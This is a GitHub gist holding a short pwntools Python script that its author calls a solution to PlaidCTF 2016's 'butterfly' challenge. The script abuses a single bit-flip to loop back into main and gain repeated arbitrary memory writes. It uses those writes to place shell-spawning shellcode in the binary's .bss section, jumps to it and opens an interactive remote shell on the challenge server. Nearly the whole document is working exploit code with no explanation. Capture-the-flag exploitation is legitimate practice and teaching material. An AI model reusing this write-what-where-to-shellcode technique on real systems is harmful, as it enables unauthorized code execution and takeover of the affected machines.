Skip to content

Instantly share code, notes, and snippets.

@kokjo
Last active April 20, 2016 10:09
Show Gist options
  • Save kokjo/9ae520bc2bfeca537bd119760f149f0b to your computer and use it in GitHub Desktop.
Save kokjo/9ae520bc2bfeca537bd119760f149f0b to your computer and use it in GitHub Desktop.
My solution to the butterfly challenge from Plaidctf 2016
from pwn import *
context(arch="amd64")
e = ELF("./butterfly_33e86bcc2f0a21d57970dc6907867bed")
r = remote("butterfly.pwning.xxx", 9999)
#r = process("./butterfly_33e86bcc2f0a21d57970dc6907867bed")
addr = 0x400860+3
num = (addr << 3) + 6
r.sendline(str(num).ljust(40)+p64(e.symbols["main"]))
def www_b(where, what):
for i in range(8):
if what & (1 << i):
num = (where << 3) + i
r.recvuntil("THOU ART GOD, WHITHER CASTEST THY COSMIC RAY?\n")
r.sendline(str(num).ljust(40)+p64(e.symbols["main"]))
def www(where, what):
for off, c in enumerate(what):
www_b(where + off, u8(c))
www(e.bss(100), asm(shellcraft.sh()))
r.recvuntil("THOU ART GOD, WHITHER CASTEST THY COSMIC RAY?\n")
r.sendline(str(e.bss(99) << 3).ljust(40)+p64(e.bss(100))) # return to our shellcode
r.clean()
r.interactive()
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment